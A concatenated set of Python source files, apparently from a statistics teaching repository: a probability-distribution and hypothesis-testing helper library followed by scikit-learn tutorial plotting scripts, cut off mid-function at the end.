Returns: float or NumPy array of probability density """ raise UnimplementedMethodException() def GetLinspace(self): """Get a linspace for plotting. Not all subclasses of Pdf implement this. Returns: numpy array """ raise UnimplementedMethodException() def MakePmf(self, **options): """Makes a discrete version of this Pdf. options can include label: string low: low end of range high: high end of range n: number of places to evaluate Returns: new Pmf """ label = options.pop('label', '') xs, ds = self.Render(**options) return Pmf(dict(zip(xs, ds)), label=label) def Render(self, **options): """Generates a sequence of points suitable for plotting. If options includes low and high, it must also include n; in that case the density is evaluated an n locations between low and high, including both. If options includes xs, the density is evaluate at those location. Otherwise, self.GetLinspace is invoked to provide the locations. Returns: tuple of (xs, densities) """ low, high = options.pop('low', None), options.pop('high', None) if low is not None and high is not None: n = options.pop('n', 101) xs = np.linspace(low, high, n) else: xs = options.pop('xs', None) if xs is None: xs = self.GetLinspace() ds = self.Density(xs) return xs, ds def Items(self): """Generates a sequence of (value, probability) pairs. """ return zip(*self.Render()) class NormalPdf(Pdf): """Represents the PDF of a Normal distribution.""" def __init__(self, mu=0, sigma=1, label=None): """Constructs a Normal Pdf with given mu and sigma. mu: mean sigma: standard deviation label: string """ self.mu = mu self.sigma = sigma self.label = label if label is not None else '_nolegend_' def __str__(self): return 'NormalPdf(%f, %f)' % (self.mu, self.sigma) def GetLinspace(self): """Get a linspace for plotting. Returns: numpy array """ low, high = self.mu-3*self.sigma, self.mu+3*self.sigma return np.linspace(low, high, 101) def Density(self, xs): """Evaluates this Pdf at xs. xs: scalar or sequence of floats returns: float or NumPy array of probability density """ return stats.norm.pdf(xs, self.mu, self.sigma) class ExponentialPdf(Pdf): """Represents the PDF of an exponential distribution.""" def __init__(self, lam=1, label=None): """Constructs an exponential Pdf with given parameter. lam: rate parameter label: string """ self.lam = lam self.label = label if label is not None else '_nolegend_' def __str__(self): return 'ExponentialPdf(%f)' % (self.lam) def GetLinspace(self): """Get a linspace for plotting. Returns: numpy array """ low, high = 0, 5.0/self.lam return np.linspace(low, high, 101) def Density(self, xs): """Evaluates this Pdf at xs. xs: scalar or sequence of floats returns: float or NumPy array of probability density """ return stats.expon.pdf(xs, scale=1.0/self.lam) class EstimatedPdf(Pdf): """Represents a PDF estimated by KDE.""" def __init__(self, sample, label=None): """Estimates the density function based on a sample. sample: sequence of data label: string """ self.label = label if label is not None else '_nolegend_' self.kde = stats.gaussian_kde(sample) low = min(sample) high = max(sample) self.linspace = np.linspace(low, high, 101) def __str__(self): return 'EstimatedPdf(label=%s)' % str(self.label) def GetLinspace(self): """Get a linspace for plotting. Returns: numpy array """ return self.linspace def Density(self, xs): """Evaluates this Pdf at xs. 
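
        Illustrative sketch (not part of the original docstring; the KDE
        depends on the random sample):

            >>> import numpy as np
            >>> sample = np.random.normal(0, 1, 1000)
            >>> pdf = EstimatedPdf(sample)
            >>> xs, ds = pdf.Render()
            >>> len(xs)
            101
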
returns: float or NumPy array of probability density """ return self.kde.evaluate(xs) def CredibleInterval(pmf, percentage=90): """Computes a credible interval for a given distribution. If percentage=90, computes the 90% CI. Args: pmf: Pmf object representing a posterior distribution percentage: float between 0 and 100 Returns: sequence of two floats, low and high """ cdf = pmf.MakeCdf() prob = (1 - percentage / 100.0) / 2 interval = cdf.Value(prob), cdf.Value(1 - prob) return interval def PmfProbLess(pmf1, pmf2): """Probability that a value from pmf1 is less than a value from pmf2. Args: pmf1: Pmf object pmf2: Pmf object Returns: float probability """ total = 0.0 for v1, p1 in pmf1.Items(): for v2, p2 in pmf2.Items(): if v1 < v2: total += p1 * p2 return total def PmfProbGreater(pmf1, pmf2): """Probability that a value from pmf1 is less than a value from pmf2. Args: pmf1: Pmf object pmf2: Pmf object Returns: float probability """ total = 0.0 for v1, p1 in pmf1.Items(): for v2, p2 in pmf2.Items(): if v1 > v2: total += p1 * p2 return total def PmfProbEqual(pmf1, pmf2): """Probability that a value from pmf1 equals a value from pmf2. Args: pmf1: Pmf object pmf2: Pmf object Returns: float probability """ total = 0.0 for v1, p1 in pmf1.Items(): for v2, p2 in pmf2.Items(): if v1 == v2: total += p1 * p2 return total def RandomSum(dists): """Chooses a random value from each dist and returns the sum. dists: sequence of Pmf or Cdf objects returns: numerical sum """ total = sum(dist.Random() for dist in dists) return total def SampleSum(dists, n): """Draws a sample of sums from a list of distributions. dists: sequence of Pmf or Cdf objects n: sample size returns: new Pmf of sums """ pmf = Pmf(RandomSum(dists) for i in range(n)) return pmf def EvalNormalPdf(x, mu, sigma): """Computes the unnormalized PDF of the normal distribution. x: value mu: mean sigma: standard deviation returns: float probability density """ return stats.norm.pdf(x, mu, sigma) def MakeNormalPmf(mu, sigma, num_sigmas, n=201): """Makes a PMF discrete approx to a Normal distribution. mu: float mean sigma: float standard deviation num_sigmas: how many sigmas to extend in each direction n: number of values in the Pmf returns: normalized Pmf """ pmf = Pmf() low = mu - num_sigmas * sigma high = mu + num_sigmas * sigma for x in np.linspace(low, high, n): p = EvalNormalPdf(x, mu, sigma) pmf.Set(x, p) pmf.Normalize() return pmf def EvalBinomialPmf(k, n, p): """Evaluates the binomial PMF. Returns the probabily of k successes in n trials with probability p. """ return stats.binom.pmf(k, n, p) def EvalHypergeomPmf(k, N, K, n): """Evaluates the hypergeometric PMF. Returns the probabily of k successes in n trials from a population N with K successes in it. """ return stats.hypergeom.pmf(k, N, K, n) def EvalPoissonPmf(k, lam): """Computes the Poisson PMF. k: number of events lam: parameter lambda in events per unit time returns: float probability """ # don't use the scipy function (yet). for lam=0 it returns NaN; # should be 0.0 # return stats.poisson.pmf(k, lam) return lam ** k * math.exp(-lam) / special.gamma(k+1) def MakePoissonPmf(lam, high, step=1): """Makes a PMF discrete approx to a Poisson distribution. lam: parameter lambda in events per unit time high: upper bound of the Pmf returns: normalized Pmf """ pmf = Pmf() for k in range(0, high + 1, step): p = EvalPoissonPmf(k, lam) pmf.Set(k, p) pmf.Normalize() return pmf def EvalExponentialPdf(x, lam): """Computes the exponential PDF. 
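
    Illustrative example (not part of the original docstring):

        >>> EvalExponentialPdf(0, lam=2)
        2.0
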
x: value lam: parameter lambda in events per unit time returns: float probability density """ return lam * math.exp(-lam * x) def EvalExponentialCdf(x, lam): """Evaluates CDF of the exponential distribution with parameter lam.""" return 1 - math.exp(-lam * x) def MakeExponentialPmf(lam, high, n=200): """Makes a PMF discrete approx to an exponential distribution. lam: parameter lambda in events per unit time high: upper bound n: number of values in the Pmf returns: normalized Pmf """ pmf = Pmf() for x in np.linspace(0, high, n): p = EvalExponentialPdf(x, lam) pmf.Set(x, p) pmf.Normalize() return pmf def StandardNormalCdf(x): """Evaluates the CDF of the standard Normal distribution. See http://en.wikipedia.org/wiki/Normal_distribution #Cumulative_distribution_function Args: x: float Returns: float """ return (math.erf(x / ROOT2) + 1) / 2 def EvalNormalCdf(x, mu=0, sigma=1): """Evaluates the CDF of the normal distribution. Args: x: float mu: mean parameter sigma: standard deviation parameter Returns: float """ return stats.norm.cdf(x, loc=mu, scale=sigma) def EvalNormalCdfInverse(p, mu=0, sigma=1): """Evaluates the inverse CDF of the normal distribution. See http://en.wikipedia.org/wiki/Normal_distribution#Quantile_function Args: p: float mu: mean parameter sigma: standard deviation parameter Returns: float """ return stats.norm.ppf(p, loc=mu, scale=sigma) def EvalLognormalCdf(x, mu=0, sigma=1): """Evaluates the CDF of the lognormal distribution. x: float or sequence mu: mean parameter sigma: standard deviation parameter Returns: float or sequence """ return stats.lognorm.cdf(x, loc=mu, scale=sigma) def RenderExpoCdf(lam, low, high, n=101): """Generates sequences of xs and ps for an exponential CDF. lam: parameter low: float high: float n: number of points to render returns: numpy arrays (xs, ps) """ xs = np.linspace(low, high, n) ps = 1 - np.exp(-lam * xs) #ps = stats.expon.cdf(xs, scale=1.0/lam) return xs, ps def RenderNormalCdf(mu, sigma, low, high, n=101): """Generates sequences of xs and ps for a Normal CDF. mu: parameter sigma: parameter low: float high: float n: number of points to render returns: numpy arrays (xs, ps) """ xs = np.linspace(low, high, n) ps = stats.norm.cdf(xs, mu, sigma) return xs, ps def RenderParetoCdf(xmin, alpha, low, high, n=50): """Generates sequences of xs and ps for a Pareto CDF. xmin: parameter alpha: parameter low: float high: float n: number of points to render returns: numpy arrays (xs, ps) """ if low < xmin: low = xmin xs = np.linspace(low, high, n) ps = 1 - (xs / xmin) ** -alpha #ps = stats.pareto.cdf(xs, scale=xmin, b=alpha) return xs, ps class Beta(object): """Represents a Beta distribution. See http://en.wikipedia.org/wiki/Beta_distribution """ def __init__(self, alpha=1, beta=1, label=None): """Initializes a Beta distribution.""" self.alpha = alpha self.beta = beta self.label = label if label is not None else '_nolegend_' def Update(self, data): """Updates a Beta distribution. data: pair of int (heads, tails) """ heads, tails = data self.alpha += heads self.beta += tails def Mean(self): """Computes the mean of this distribution.""" return self.alpha / (self.alpha + self.beta) def Random(self): """Generates a random variate from this distribution.""" return random.betavariate(self.alpha, self.beta) def Sample(self, n): """Generates a random sample from this distribution. 
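
        Illustrative example (not part of the original docstring; draws are
        random):

            >>> beta = Beta(alpha=2, beta=3)
            >>> sample = beta.Sample(1000)
            >>> sample.shape
            (1000,)
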
n: int sample size """ size = n, return np.random.beta(self.alpha, self.beta, size) def EvalPdf(self, x): """Evaluates the PDF at x.""" return x ** (self.alpha - 1) * (1 - x) ** (self.beta - 1) def MakePmf(self, steps=101, label=None): """Returns a Pmf of this distribution. Note: Normally, we just evaluate the PDF at a sequence of points and treat the probability density as a probability mass. But if alpha or beta is less than one, we have to be more careful because the PDF goes to infinity at x=0 and x=1. In that case we evaluate the CDF and compute differences. """ if self.alpha < 1 or self.beta < 1: cdf = self.MakeCdf() pmf = cdf.MakePmf() return pmf xs = [i / (steps - 1.0) for i in range(steps)] probs = [self.EvalPdf(x) for x in xs] pmf = Pmf(dict(zip(xs, probs)), label=label) return pmf def MakeCdf(self, steps=101): """Returns the CDF of this distribution.""" xs = [i / (steps - 1.0) for i in range(steps)] ps = [special.betainc(self.alpha, self.beta, x) for x in xs] cdf = Cdf(xs, ps) return cdf class Dirichlet(object): """Represents a Dirichlet distribution. See http://en.wikipedia.org/wiki/Dirichlet_distribution """ def __init__(self, n, conc=1, label=None): """Initializes a Dirichlet distribution. n: number of dimensions conc: concentration parameter (smaller yields more concentration) label: string label """ if n < 2: raise ValueError('A Dirichlet distribution with ' 'n<2 makes no sense') self.n = n self.params = np.ones(n, dtype=np.float) * conc self.label = label if label is not None else '_nolegend_' def Update(self, data): """Updates a Dirichlet distribution. data: sequence of observations, in order corresponding to params """ m = len(data) self.params[:m] += data def Random(self): """Generates a random variate from this distribution. Returns: normalized vector of fractions """ p = np.random.gamma(self.params) return p / p.sum() def Likelihood(self, data): """Computes the likelihood of the data. Selects a random vector of probabilities from this distribution. Returns: float probability """ m = len(data) if self.n < m: return 0 x = data p = self.Random() q = p[:m] ** x return q.prod() def LogLikelihood(self, data): """Computes the log likelihood of the data. Selects a random vector of probabilities from this distribution. Returns: float log probability """ m = len(data) if self.n < m: return float('-inf') x = self.Random() y = np.log(x[:m]) * data return y.sum() def MarginalBeta(self, i): """Computes the marginal distribution of the ith element. See http://en.wikipedia.org/wiki/Dirichlet_distribution #Marginal_distributions i: int Returns: Beta object """ alpha0 = self.params.sum() alpha = self.params[i] return Beta(alpha, alpha0 - alpha) def PredictivePmf(self, xs, label=None): """Makes a predictive distribution. xs: values to go into the Pmf Returns: Pmf that maps from x to the mean prevalence of x """ alpha0 = self.params.sum() ps = self.params / alpha0 return Pmf(zip(xs, ps), label=label) def BinomialCoef(n, k): """Compute the binomial coefficient "n choose k". n: number of trials k: number of successes Returns: float """ return scipy.misc.comb(n, k) def LogBinomialCoef(n, k): """Computes the log of the binomial coefficient. http://math.stackexchange.com/questions/64716/ approximating-the-logarithm-of-the-binomial-coefficient n: number of trials k: number of successes Returns: float """ return n * math.log(n) - k * math.log(k) - (n - k) * math.log(n - k) def NormalProbability(ys, jitter=0.0): """Generates data for a normal probability plot. 
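
    Illustrative sketch (not part of the original docstring; the xs are
    random standard normal variates):

        >>> import numpy as np
        >>> sample = np.random.normal(5, 2, 100)
        >>> xs, ys = NormalProbability(sample)
        >>> len(xs) == len(ys) == 100
        True
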
ys: sequence of values jitter: float magnitude of jitter added to the ys returns: numpy arrays xs, ys """ n = len(ys) xs = np.random.normal(0, 1, n) xs.sort() if jitter: ys = Jitter(ys, jitter) else: ys = np.array(ys) ys.sort() return xs, ys def Jitter(values, jitter=0.5): """Jitters the values by adding a uniform variate in (-jitter, jitter). values: sequence jitter: scalar magnitude of jitter returns: new numpy array """ n = len(values) return np.random.uniform(-jitter, +jitter, n) + values def NormalProbabilityPlot(sample, fit_color='0.8', **options): """Makes a normal probability plot with a fitted line. sample: sequence of numbers fit_color: color string for the fitted line options: passed along to Plot """ xs, ys = NormalProbability(sample) mean, var = MeanVar(sample) std = math.sqrt(var) fit = FitLine(xs, mean, std) thinkplot.Plot(*fit, color=fit_color, label='model') xs, ys = NormalProbability(sample) thinkplot.Plot(xs, ys, **options) def Mean(xs): """Computes mean. xs: sequence of values returns: float mean """ return np.mean(xs) def Var(xs, mu=None, ddof=0): """Computes variance. xs: sequence of values mu: option known mean ddof: delta degrees of freedom returns: float """ xs = np.asarray(xs) if mu is None: mu = xs.mean() ds = xs - mu return np.dot(ds, ds) / (len(xs) - ddof) def Std(xs, mu=None, ddof=0): """Computes standard deviation. xs: sequence of values mu: option known mean ddof: delta degrees of freedom returns: float """ var = Var(xs, mu, ddof) return math.sqrt(var) def MeanVar(xs, ddof=0): """Computes mean and variance. Based on http://stackoverflow.com/questions/19391149/ numpy-mean-and-variance-from-single-function xs: sequence of values ddof: delta degrees of freedom returns: pair of float, mean and var """ xs = np.asarray(xs) mean = xs.mean() s2 = Var(xs, mean, ddof) return mean, s2 def Trim(t, p=0.01): """Trims the largest and smallest elements of t. Args: t: sequence of numbers p: fraction of values to trim off each end Returns: sequence of values """ n = int(p * len(t)) t = sorted(t)[n:-n] return t def TrimmedMean(t, p=0.01): """Computes the trimmed mean of a sequence of numbers. Args: t: sequence of numbers p: fraction of values to trim off each end Returns: float """ t = Trim(t, p) return Mean(t) def TrimmedMeanVar(t, p=0.01): """Computes the trimmed mean and variance of a sequence of numbers. Side effect: sorts the list. Args: t: sequence of numbers p: fraction of values to trim off each end Returns: float """ t = Trim(t, p) mu, var = MeanVar(t) return mu, var def CohenEffectSize(group1, group2): """Compute Cohen's d. group1: Series or NumPy array group2: Series or NumPy array returns: float """ diff = group1.mean() - group2.mean() n1, n2 = len(group1), len(group2) var1 = group1.var() var2 = group2.var() pooled_var = (n1 * var1 + n2 * var2) / (n1 + n2) d = diff / math.sqrt(pooled_var) return d def Cov(xs, ys, meanx=None, meany=None): """Computes Cov(X, Y). Args: xs: sequence of values ys: sequence of values meanx: optional float mean of xs meany: optional float mean of ys Returns: Cov(X, Y) """ xs = np.asarray(xs) ys = np.asarray(ys) if meanx is None: meanx = np.mean(xs) if meany is None: meany = np.mean(ys) cov = np.dot(xs-meanx, ys-meany) / len(xs) return cov def Corr(xs, ys): """Computes Corr(X, Y). 
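
    Illustrative example (not part of the original docstring):

        >>> float(Corr([1, 2, 3, 4], [2, 4, 6, 8]))
        1.0
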
Args: xs: sequence of values ys: sequence of values Returns: Corr(X, Y) """ xs = np.asarray(xs) ys = np.asarray(ys) meanx, varx = MeanVar(xs) meany, vary = MeanVar(ys) corr = Cov(xs, ys, meanx, meany) / math.sqrt(varx * vary) return corr def SerialCorr(series, lag=1): """Computes the serial correlation of a series. series: Series lag: integer number of intervals to shift returns: float correlation """ xs = series[lag:] ys = series.shift(lag)[lag:] corr = Corr(xs, ys) return corr def SpearmanCorr(xs, ys): """Computes Spearman's rank correlation. Args: xs: sequence of values ys: sequence of values Returns: float Spearman's correlation """ xranks = pandas.Series(xs).rank() yranks = pandas.Series(ys).rank() return Corr(xranks, yranks) def MapToRanks(t): """Returns a list of ranks corresponding to the elements in t. Args: t: sequence of numbers Returns: list of integer ranks, starting at 1 """ # pair up each value with its index pairs = enumerate(t) # sort by value sorted_pairs = sorted(pairs, key=itemgetter(1)) # pair up each pair with its rank ranked = enumerate(sorted_pairs) # sort by index resorted = sorted(ranked, key=lambda trip: trip[1][0]) # extract the ranks ranks = [trip[0]+1 for trip in resorted] return ranks def LeastSquares(xs, ys): """Computes a linear least squares fit for ys as a function of xs. Args: xs: sequence of values ys: sequence of values Returns: tuple of (intercept, slope) """ meanx, varx = MeanVar(xs) meany = Mean(ys) slope = Cov(xs, ys, meanx, meany) / varx inter = meany - slope * meanx return inter, slope def FitLine(xs, inter, slope): """Fits a line to the given data. xs: sequence of x returns: tuple of numpy arrays (sorted xs, fit ys) """ fit_xs = np.sort(xs) fit_ys = inter + slope * fit_xs return fit_xs, fit_ys def Residuals(xs, ys, inter, slope): """Computes residuals for a linear fit with parameters inter and slope. Args: xs: independent variable ys: dependent variable inter: float intercept slope: float slope Returns: list of residuals """ xs = np.asarray(xs) ys = np.asarray(ys) res = ys - (inter + slope * xs) return res def CoefDetermination(ys, res): """Computes the coefficient of determination (R^2) for given residuals. Args: ys: dependent variable res: residuals Returns: float coefficient of determination """ return 1 - Var(res) / Var(ys) def CorrelatedGenerator(rho): """Generates standard normal variates with serial correlation. rho: target coefficient of correlation Returns: iterable """ x = random.gauss(0, 1) yield x sigma = math.sqrt(1 - rho**2) while True: x = random.gauss(x * rho, sigma) yield x def CorrelatedNormalGenerator(mu, sigma, rho): """Generates normal variates with serial correlation. mu: mean of variate sigma: standard deviation of variate rho: target coefficient of correlation Returns: iterable """ for x in CorrelatedGenerator(rho): yield x * sigma + mu def RawMoment(xs, k): """Computes the kth raw moment of xs. """ return sum(x**k for x in xs) / len(xs) def CentralMoment(xs, k): """Computes the kth central moment of xs. """ mean = RawMoment(xs, 1) return sum((x - mean)**k for x in xs) / len(xs) def StandardizedMoment(xs, k): """Computes the kth standardized moment of xs. """ var = CentralMoment(xs, 2) std = math.sqrt(var) return CentralMoment(xs, k) / std**k def Skewness(xs): """Computes skewness. """ return StandardizedMoment(xs, 3) def Median(xs): """Computes the median (50th percentile) of a sequence. 
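
    Illustrative example (not part of the original docstring):

        >>> int(Median([1, 2, 3, 4, 5]))
        3
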
xs: sequence or anything else that can initialize a Cdf returns: float """ cdf = Cdf(xs) return cdf.Value(0.5) def IQR(xs): """Computes the interquartile of a sequence. xs: sequence or anything else that can initialize a Cdf returns: pair of floats """ cdf = Cdf(xs) return cdf.Value(0.25), cdf.Value(0.75) def PearsonMedianSkewness(xs): """Computes the Pearson median skewness. """ median = Median(xs) mean = RawMoment(xs, 1) var = CentralMoment(xs, 2) std = math.sqrt(var) gp = 3 * (mean - median) / std return gp class FixedWidthVariables(object): """Represents a set of variables in a fixed width file.""" def __init__(self, variables, index_base=0): """Initializes. variables: DataFrame index_base: are the indices 0 or 1 based? Attributes: colspecs: list of (start, end) index tuples names: list of string variable names """ self.variables = variables # note: by default, subtract 1 from colspecs self.colspecs = variables[['start', 'end']] - index_base # convert colspecs to a list of pair of int self.colspecs = self.colspecs.astype(np.int).values.tolist() self.names = variables['name'] def ReadFixedWidth(self, filename, **options): """Reads a fixed width ASCII file. filename: string filename returns: DataFrame """ df = pandas.read_fwf(filename, colspecs=self.colspecs, names=self.names, **options) return df def ReadStataDct(dct_file, **options): """Reads a Stata dictionary file. dct_file: string filename options: dict of options passed to open() returns: FixedWidthVariables object """ type_map = dict(byte=int, int=int, long=int, float=float, double=float) var_info = [] for line in open(dct_file, **options): match = re.search( r'_column\(([^)]*)\)', line) if match: start = int(match.group(1)) t = line.split() vtype, name, fstring = t[1:4] name = name.lower() if vtype.startswith('str'): vtype = str else: vtype = type_map[vtype] long_desc = ' '.join(t[4:]).strip('"') var_info.append((start, vtype, name, fstring, long_desc)) columns = ['start', 'type', 'name', 'fstring', 'desc'] variables = pandas.DataFrame(var_info, columns=columns) # fill in the end column by shifting the start column variables['end'] = variables.start.shift(-1) variables.loc[len(variables)-1, 'end'] = 0 dct = FixedWidthVariables(variables, index_base=1) return dct def Resample(xs, n=None): """Draw a sample from xs with the same length as xs. xs: sequence n: sample size (default: len(xs)) returns: NumPy array """ if n is None: n = len(xs) return np.random.choice(xs, n, replace=True) def SampleRows(df, nrows, replace=False): """Choose a sample of rows from a DataFrame. df: DataFrame nrows: number of rows replace: whether to sample with replacement returns: DataDf """ indices = np.random.choice(df.index, nrows, replace=replace) sample = df.loc[indices] return sample def ResampleRows(df): """Resamples rows from a DataFrame. df: DataFrame returns: DataFrame """ return SampleRows(df, len(df), replace=True) def ResampleRowsWeighted(df, column='finalwgt'): """Resamples a DataFrame using probabilities proportional to given column. df: DataFrame column: string column name to use as weights returns: DataFrame """ weights = df[column] cdf = Cdf(dict(weights)) indices = cdf.Sample(len(weights)) sample = df.loc[indices] return sample def PercentileRow(array, p): """Selects the row from a sorted array that maps to percentile p. 
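    array: 2-D NumPy array, assumed sorted along axis 0 (as done in PercentileRows below)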
p: float 0--100 returns: NumPy array (one row) """ rows, cols = array.shape index = int(rows * p / 100) return array[index,] def PercentileRows(ys_seq, percents): """Given a collection of lines, selects percentiles along vertical axis. For example, if ys_seq contains simulation results like ys as a function of time, and percents contains (5, 95), the result would be a 90% CI for each vertical slice of the simulation results. ys_seq: sequence of lines (y values) percents: list of percentiles (0-100) to select returns: list of NumPy arrays, one for each percentile """ nrows = len(ys_seq) ncols = len(ys_seq[0]) array = np.zeros((nrows, ncols)) for i, ys in enumerate(ys_seq): array[i,] = ys array = np.sort(array, axis=0) rows = [PercentileRow(array, p) for p in percents] return rows def Smooth(xs, sigma=2, **options): """Smooths a NumPy array with a Gaussian filter. xs: sequence sigma: standard deviation of the filter """ return ndimage.filters.gaussian_filter1d(xs, sigma, **options) class HypothesisTest(object): """Represents a hypothesis test.""" def __init__(self, data): """Initializes. data: data in whatever form is relevant """ self.data = data self.MakeModel() self.actual = self.TestStatistic(data) self.test_stats = None self.test_cdf = None def PValue(self, iters=1000): """Computes the distribution of the test statistic and p-value. iters: number of iterations returns: float p-value """ self.test_stats = [self.TestStatistic(self.RunModel()) for _ in range(iters)] self.test_cdf = Cdf(self.test_stats) count = sum(1 for x in self.test_stats if x >= self.actual) return count / iters def MaxTestStat(self): """Returns the largest test statistic seen during simulations. """ return max(self.test_stats) def PlotCdf(self, label=None): """Draws a Cdf with vertical lines at the observed test stat. """ def VertLine(x): """Draws a vertical line at x.""" thinkplot.Plot([x, x], [0, 1], color='0.8') VertLine(self.actual) thinkplot.Cdf(self.test_cdf, label=label) def TestStatistic(self, data): """Computes the test statistic. data: data in whatever form is relevant """ raise UnimplementedMethodException() def MakeModel(self): """Build a model of the null hypothesis. """ pass def RunModel(self): """Run the model of the null hypothesis. 
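        Subclasses override this to generate simulated data under the null
        hypothesis; this base implementation raises UnimplementedMethodException.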
returns: simulated data """ raise UnimplementedMethodException() def main(): pass if __name__ == '__main__': main() File: scikit-learn/__init__.py File: scikit-learn/fig_code/sgd_separator.py import numpy as np import matplotlib.pyplot as plt from sklearn.linear_model import SGDClassifier from sklearn.datasets.samples_generator import make_blobs def plot_sgd_separator(): # we create 50 separable points X, Y = make_blobs(n_samples=50, centers=2, random_state=0, cluster_std=0.60) # fit the model clf = SGDClassifier(loss="hinge", alpha=0.01, n_iter=200, fit_intercept=True) clf.fit(X, Y) # plot the line, the points, and the nearest vectors to the plane xx = np.linspace(-1, 5, 10) yy = np.linspace(-1, 5, 10) X1, X2 = np.meshgrid(xx, yy) Z = np.empty(X1.shape) for (i, j), val in np.ndenumerate(X1): x1 = val x2 = X2[i, j] p = clf.decision_function([x1, x2]) Z[i, j] = p[0] levels = [-1.0, 0.0, 1.0] linestyles = ['dashed', 'solid', 'dashed'] colors = 'k' ax = plt.axes() ax.contour(X1, X2, Z, levels, colors=colors, linestyles=linestyles) ax.scatter(X[:, 0], X[:, 1], c=Y, cmap=plt.cm.Paired) ax.axis('tight') if __name__ == '__main__': plot_sgd_separator() plt.show() File: scikit-learn/fig_code/__init__.py from .data import * from .figures import * from .sgd_separator import plot_sgd_separator from .linear_regression import plot_linear_regression from .helpers import plot_iris_knn File: scikit-learn/fig_code/ML_flow_chart.py """ Tutorial Diagrams ----------------- This script plots the flow-charts used in the scikit-learn tutorials. """ import numpy as np import pylab as pl from matplotlib.patches import Circle, Rectangle, Polygon, Arrow, FancyArrow def create_base(box_bg = '#CCCCCC', arrow1 = '#88CCFF', arrow2 = '#88FF88', supervised=True): fig = pl.figure(figsize=(9, 6), facecolor='w') ax = pl.axes((0, 0, 1, 1), xticks=[], yticks=[], frameon=False) ax.set_xlim(0, 9) ax.set_ylim(0, 6) patches = [Rectangle((0.3, 3.6), 1.5, 1.8, zorder=1, fc=box_bg), Rectangle((0.5, 3.8), 1.5, 1.8, zorder=2, fc=box_bg), Rectangle((0.7, 4.0), 1.5, 1.8, zorder=3, fc=box_bg), Rectangle((2.9, 3.6), 0.2, 1.8, fc=box_bg), Rectangle((3.1, 3.8), 0.2, 1.8, fc=box_bg), Rectangle((3.3, 4.0), 0.2, 1.8, fc=box_bg), Rectangle((0.3, 0.2), 1.5, 1.8, fc=box_bg), Rectangle((2.9, 0.2), 0.2, 1.8, fc=box_bg), Circle((5.5, 3.5), 1.0, fc=box_bg), Polygon([[5.5, 1.7], [6.1, 1.1], [5.5, 0.5], [4.9, 1.1]], fc=box_bg), FancyArrow(2.3, 4.6, 0.35, 0, fc=arrow1, width=0.25, head_width=0.5, head_length=0.2), FancyArrow(3.75, 4.2, 0.5, -0.2, fc=arrow1, width=0.25, head_width=0.5, head_length=0.2), FancyArrow(5.5, 2.4, 0, -0.4, fc=arrow1, width=0.25, head_width=0.5, head_length=0.2), FancyArrow(2.0, 1.1, 0.5, 0, fc=arrow2, width=0.25, head_width=0.5, head_length=0.2), FancyArrow(3.3, 1.1, 1.3, 0, fc=arrow2, width=0.25, head_width=0.5, head_length=0.2), FancyArrow(6.2, 1.1, 0.8, 0, fc=arrow2, width=0.25, head_width=0.5, head_length=0.2)] if supervised: patches += [Rectangle((0.3, 2.4), 1.5, 0.5, zorder=1, fc=box_bg), Rectangle((0.5, 2.6), 1.5, 0.5, zorder=2, fc=box_bg), Rectangle((0.7, 2.8), 1.5, 0.5, zorder=3, fc=box_bg), FancyArrow(2.3, 2.9, 2.0, 0, fc=arrow1, width=0.25, head_width=0.5, head_length=0.2), Rectangle((7.3, 0.85), 1.5, 0.5, fc=box_bg)] else: patches += [Rectangle((7.3, 0.2), 1.5, 1.8, fc=box_bg)] for p in patches: ax.add_patch(p) pl.text(1.45, 4.9, "Training\nText,\nDocuments,\nImages,\netc.", ha='center', va='center', fontsize=14) pl.text(3.6, 4.9, "Feature\nVectors", ha='left', va='center', fontsize=14) pl.text(5.5, 3.5, 
"Machine\nLearning\nAlgorithm", ha='center', va='center', fontsize=14) pl.text(1.05, 1.1, "New Text,\nDocument,\nImage,\netc.", ha='center', va='center', fontsize=14) pl.text(3.3, 1.7, "Feature\nVector", ha='left', va='center', fontsize=14) pl.text(5.5, 1.1, "Predictive\nModel", ha='center', va='center', fontsize=12) if supervised: pl.text(1.45, 3.05, "Labels", ha='center', va='center', fontsize=14) pl.text(8.05, 1.1, "Expected\nLabel", ha='center', va='center', fontsize=14) pl.text(8.8, 5.8, "Supervised Learning Model", ha='right', va='top', fontsize=18) else: pl.text(8.05, 1.1, "Likelihood\nor Cluster ID\nor Better\nRepresentation", ha='center', va='center', fontsize=12) pl.text(8.8, 5.8, "Unsupervised Learning Model", ha='right', va='top', fontsize=18) def plot_supervised_chart(annotate=False): create_base(supervised=True) if annotate: fontdict = dict(color='r', weight='bold', size=14) pl.text(1.9, 4.55, 'X = vec.fit_transform(input)', fontdict=fontdict, rotation=20, ha='left', va='bottom') pl.text(3.7, 3.2, 'clf.fit(X, y)', fontdict=fontdict, rotation=20, ha='left', va='bottom') pl.text(1.7, 1.5, 'X_new = vec.transform(input)', fontdict=fontdict, rotation=20, ha='left', va='bottom') pl.text(6.1, 1.5, 'y_new = clf.predict(X_new)', fontdict=fontdict, rotation=20, ha='left', va='bottom') def plot_unsupervised_chart(): create_base(supervised=False) if __name__ == '__main__': plot_supervised_chart(False) plot_supervised_chart(True) plot_unsupervised_chart() pl.show() File: scikit-learn/fig_code/figures.py import numpy as np import matplotlib.pyplot as plt import warnings def plot_venn_diagram(): fig, ax = plt.subplots(subplot_kw=dict(frameon=False, xticks=[], yticks=[])) ax.add_patch(plt.Circle((0.3, 0.3), 0.3, fc='red', alpha=0.5)) ax.add_patch(plt.Circle((0.6, 0.3), 0.3, fc='blue', alpha=0.5)) ax.add_patch(plt.Rectangle((-0.1, -0.1), 1.1, 0.8, fc='none', ec='black')) ax.text(0.2, 0.3, '$x$', size=30, ha='center', va='center') ax.text(0.7, 0.3, '$y$', size=30, ha='center', va='center') ax.text(0.0, 0.6, '$I$', size=30) ax.axis('equal') def plot_example_decision_tree(): fig = plt.figure(figsize=(10, 4)) ax = fig.add_axes([0, 0, 0.8, 1], frameon=False, xticks=[], yticks=[]) ax.set_title('Example Decision Tree: Animal Classification', size=24) def text(ax, x, y, t, size=20, **kwargs): ax.text(x, y, t, ha='center', va='center', size=size, bbox=dict(boxstyle='round', ec='k', fc='w'), **kwargs) text(ax, 0.5, 0.9, "How big is\nthe animal?", 20) text(ax, 0.3, 0.6, "Does the animal\nhave horns?", 18) text(ax, 0.7, 0.6, "Does the animal\nhave two legs?", 18) text(ax, 0.12, 0.3, "Are the horns\nlonger than 10cm?", 14) text(ax, 0.38, 0.3, "Is the animal\nwearing a collar?", 14) text(ax, 0.62, 0.3, "Does the animal\nhave wings?", 14) text(ax, 0.88, 0.3, "Does the animal\nhave a tail?", 14) text(ax, 0.4, 0.75, "> 1m", 12, alpha=0.4) text(ax, 0.6, 0.75, "< 1m", 12, alpha=0.4) text(ax, 0.21, 